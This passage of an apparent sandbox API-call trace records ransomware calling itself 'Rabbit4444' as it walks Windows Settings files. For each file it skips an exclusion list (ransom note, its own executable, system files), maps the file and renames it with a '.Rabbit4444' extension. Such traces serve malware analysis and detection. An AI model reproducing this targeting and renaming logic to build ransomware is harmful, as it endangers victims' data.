lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.646] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0056.646] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14795685952) returned 1 [0056.646] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0056.646] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0056.646] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.646] CloseHandle (hObject=0x298) returned 1 [0056.646] CloseHandle (hObject=0x278) returned 1 [0056.646] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkMobileHotspot.settingcontent-ms.Rabbit4444") returned 182 [0056.646] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkMobileHotspot.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagenetworkmobilehotspot.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkMobileHotspot.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagenetworkmobilehotspot.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.647] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x645a5cb, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x645a5cb, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x239dc2f0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x42b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageNetworkProxy.settingcontent-ms", cAlternateFileName="AA16BE~1.SET")) returned 1 [0056.647] lstrcmpiW (lpString1="AAA_SettingsPageNetworkProxy.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.647] lstrcmpiW (lpString1="AAA_SettingsPageNetworkProxy.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.647] lstrcmpiW (lpString1="AAA_SettingsPageNetworkProxy.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.647] lstrcmpiW (lpString1="AAA_SettingsPageNetworkProxy.settingcontent-ms", lpString2=".") returned 1 [0056.647] lstrcmpiW (lpString1="AAA_SettingsPageNetworkProxy.settingcontent-ms", lpString2="..") returned 1 [0056.647] lstrcmpiW (lpString1="AAA_SettingsPageNetworkProxy.settingcontent-ms", lpString2="windows") returned -1 [0056.647] lstrcmpiW (lpString1="AAA_SettingsPageNetworkProxy.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.647] lstrcmpiW (lpString1="AAA_SettingsPageNetworkProxy.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.647] lstrcmpiW (lpString1="AAA_SettingsPageNetworkProxy.settingcontent-ms", lpString2="boot") returned -1 [0056.647] lstrcmpiW (lpString1="AAA_SettingsPageNetworkProxy.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.648] lstrcmpiW (lpString1="AAA_SettingsPageNetworkProxy.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.648] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageNetworkProxy.settingcontent-ms" | out: lpString1="AAA_SettingsPageNetworkProxy.settingcontent-ms") returned="AAA_SettingsPageNetworkProxy.settingcontent-ms" [0056.648] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkProxy.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.648] lstrlenW (lpString="AAA_SettingsPageNetworkProxy.settingcontent-ms") returned 46 [0056.648] lstrlenW (lpString="Rabbit4444") returned 10 [0056.648] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.648] lstrlenW (lpString=".dll") returned 4 [0056.648] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.648] lstrlenW (lpString=".lnk") returned 4 [0056.648] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.648] lstrlenW (lpString=".ini") returned 4 [0056.648] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.648] lstrlenW (lpString=".sys") returned 4 [0056.648] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.648] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkProxy.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagenetworkproxy.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.648] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.648] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14795915976) returned 1 [0056.648] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1067) returned 1 [0056.649] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0056.649] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0056.649] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x730, lpName=0x0) returned 0x298 [0056.651] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x730) returned 0x70000 [0056.652] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.652] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0056.652] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.652] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0056.652] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.652] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0056.652] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.652] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0056.652] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14796289881) returned 1 [0056.652] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0056.652] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0056.652] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.652] CloseHandle (hObject=0x298) returned 1 [0056.652] CloseHandle (hObject=0x278) returned 1 [0056.653] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkProxy.settingcontent-ms.Rabbit4444") returned 174 [0056.653] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkProxy.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagenetworkproxy.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkProxy.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagenetworkproxy.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.653] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68ac9d0, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x68ac9d0, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x234329b1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x421, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageNetworkVPN.settingcontent-ms", cAlternateFileName="AAE339~1.SET")) returned 1 [0056.653] lstrcmpiW (lpString1="AAA_SettingsPageNetworkVPN.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.653] lstrcmpiW (lpString1="AAA_SettingsPageNetworkVPN.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.653] lstrcmpiW (lpString1="AAA_SettingsPageNetworkVPN.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.653] lstrcmpiW (lpString1="AAA_SettingsPageNetworkVPN.settingcontent-ms", lpString2=".") returned 1 [0056.653] lstrcmpiW (lpString1="AAA_SettingsPageNetworkVPN.settingcontent-ms", lpString2="..") returned 1 [0056.653] lstrcmpiW (lpString1="AAA_SettingsPageNetworkVPN.settingcontent-ms", lpString2="windows") returned -1 [0056.653] lstrcmpiW (lpString1="AAA_SettingsPageNetworkVPN.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.653] lstrcmpiW (lpString1="AAA_SettingsPageNetworkVPN.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.654] lstrcmpiW (lpString1="AAA_SettingsPageNetworkVPN.settingcontent-ms", lpString2="boot") returned -1 [0056.654] lstrcmpiW (lpString1="AAA_SettingsPageNetworkVPN.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.654] lstrcmpiW (lpString1="AAA_SettingsPageNetworkVPN.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.654] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageNetworkVPN.settingcontent-ms" | out: lpString1="AAA_SettingsPageNetworkVPN.settingcontent-ms") returned="AAA_SettingsPageNetworkVPN.settingcontent-ms" [0056.654] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkVPN.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.654] lstrlenW (lpString="AAA_SettingsPageNetworkVPN.settingcontent-ms") returned 44 [0056.654] lstrlenW (lpString="Rabbit4444") returned 10 [0056.654] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.654] lstrlenW (lpString=".dll") returned 4 [0056.654] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.654] lstrlenW (lpString=".lnk") returned 4 [0056.654] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.654] lstrlenW (lpString=".ini") returned 4 [0056.654] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.654] lstrlenW (lpString=".sys") returned 4 [0056.654] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.654] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkVPN.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagenetworkvpn.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.654] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.654] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14796521627) returned 1 [0056.655] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1057) returned 1 [0056.655] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0056.655] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0056.655] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x730, lpName=0x0) returned 0x298 [0056.656] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x730) returned 0x70000 [0056.656] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.656] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0056.656] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.656] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0056.657] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.657] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0056.657] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.657] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0056.657] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14796764441) returned 1 [0056.657] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0056.657] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0056.657] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.657] CloseHandle (hObject=0x298) returned 1 [0056.657] CloseHandle (hObject=0x278) returned 1 [0056.657] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkVPN.settingcontent-ms.Rabbit4444") returned 172 [0056.657] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkVPN.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagenetworkvpn.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkVPN.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagenetworkvpn.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.658] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a9c8b8, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x6a9c8b8, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a4ea03, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x426, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageNetworkWiFi.settingcontent-ms", cAlternateFileName="AA60E9~1.SET")) returned 1 [0056.658] lstrcmpiW (lpString1="AAA_SettingsPageNetworkWiFi.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.658] lstrcmpiW (lpString1="AAA_SettingsPageNetworkWiFi.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.658] lstrcmpiW (lpString1="AAA_SettingsPageNetworkWiFi.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.658] lstrcmpiW (lpString1="AAA_SettingsPageNetworkWiFi.settingcontent-ms", lpString2=".") returned 1 [0056.658] lstrcmpiW (lpString1="AAA_SettingsPageNetworkWiFi.settingcontent-ms", lpString2="..") returned 1 [0056.658] lstrcmpiW (lpString1="AAA_SettingsPageNetworkWiFi.settingcontent-ms", lpString2="windows") returned -1 [0056.658] lstrcmpiW (lpString1="AAA_SettingsPageNetworkWiFi.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.658] lstrcmpiW (lpString1="AAA_SettingsPageNetworkWiFi.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.658] lstrcmpiW (lpString1="AAA_SettingsPageNetworkWiFi.settingcontent-ms", lpString2="boot") returned -1 [0056.658] lstrcmpiW (lpString1="AAA_SettingsPageNetworkWiFi.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.658] lstrcmpiW (lpString1="AAA_SettingsPageNetworkWiFi.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.658] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageNetworkWiFi.settingcontent-ms" | out: lpString1="AAA_SettingsPageNetworkWiFi.settingcontent-ms") returned="AAA_SettingsPageNetworkWiFi.settingcontent-ms" [0056.658] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkWiFi.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.659] lstrlenW (lpString="AAA_SettingsPageNetworkWiFi.settingcontent-ms") returned 45 [0056.659] lstrlenW (lpString="Rabbit4444") returned 10 [0056.659] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.659] lstrlenW (lpString=".dll") returned 4 [0056.659] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.659] lstrlenW (lpString=".lnk") returned 4 [0056.659] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.659] lstrlenW (lpString=".ini") returned 4 [0056.659] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.659] lstrlenW (lpString=".sys") returned 4 [0056.659] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.659] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkWiFi.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagenetworkwifi.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.659] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.659] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14796985870) returned 1 [0056.659] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1062) returned 1 [0056.659] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0056.659] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0056.659] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x730, lpName=0x0) returned 0x298 [0056.660] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x730) returned 0x70000 [0056.661] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.661] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0056.661] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.661] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0056.661] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.661] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0056.662] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.662] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0056.662] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14797234827) returned 1 [0056.662] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0056.662] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0056.662] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.662] CloseHandle (hObject=0x298) returned 1 [0056.662] CloseHandle (hObject=0x278) returned 1 [0056.662] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkWiFi.settingcontent-ms.Rabbit4444") returned 173 [0056.662] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkWiFi.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagenetworkwifi.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkWiFi.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagenetworkwifi.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.663] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c402ce, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x6c402ce, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x239dc2f0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x43f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageNetworkWorkplace.settingcontent-ms", cAlternateFileName="AA3ED6~1.SET")) returned 1 [0056.663] lstrcmpiW (lpString1="AAA_SettingsPageNetworkWorkplace.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.663] lstrcmpiW (lpString1="AAA_SettingsPageNetworkWorkplace.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.663] lstrcmpiW (lpString1="AAA_SettingsPageNetworkWorkplace.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.663] lstrcmpiW (lpString1="AAA_SettingsPageNetworkWorkplace.settingcontent-ms", lpString2=".") returned 1 [0056.663] lstrcmpiW (lpString1="AAA_SettingsPageNetworkWorkplace.settingcontent-ms", lpString2="..") returned 1 [0056.663] lstrcmpiW (lpString1="AAA_SettingsPageNetworkWorkplace.settingcontent-ms", lpString2="windows") returned -1 [0056.663] lstrcmpiW (lpString1="AAA_SettingsPageNetworkWorkplace.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.663] lstrcmpiW (lpString1="AAA_SettingsPageNetworkWorkplace.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.663] lstrcmpiW (lpString1="AAA_SettingsPageNetworkWorkplace.settingcontent-ms", lpString2="boot") returned -1 [0056.663] lstrcmpiW (lpString1="AAA_SettingsPageNetworkWorkplace.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.663] lstrcmpiW (lpString1="AAA_SettingsPageNetworkWorkplace.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.663] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageNetworkWorkplace.settingcontent-ms" | out: lpString1="AAA_SettingsPageNetworkWorkplace.settingcontent-ms") returned="AAA_SettingsPageNetworkWorkplace.settingcontent-ms" [0056.663] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkWorkplace.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.663] lstrlenW (lpString="AAA_SettingsPageNetworkWorkplace.settingcontent-ms") returned 50 [0056.663] lstrlenW (lpString="Rabbit4444") returned 10 [0056.663] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.663] lstrlenW (lpString=".dll") returned 4 [0056.663] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.663] lstrlenW (lpString=".lnk") returned 4 [0056.663] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.663] lstrlenW (lpString=".ini") returned 4 [0056.663] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.664] lstrlenW (lpString=".sys") returned 4 [0056.664] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.664] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkWorkplace.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagenetworkworkplace.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, 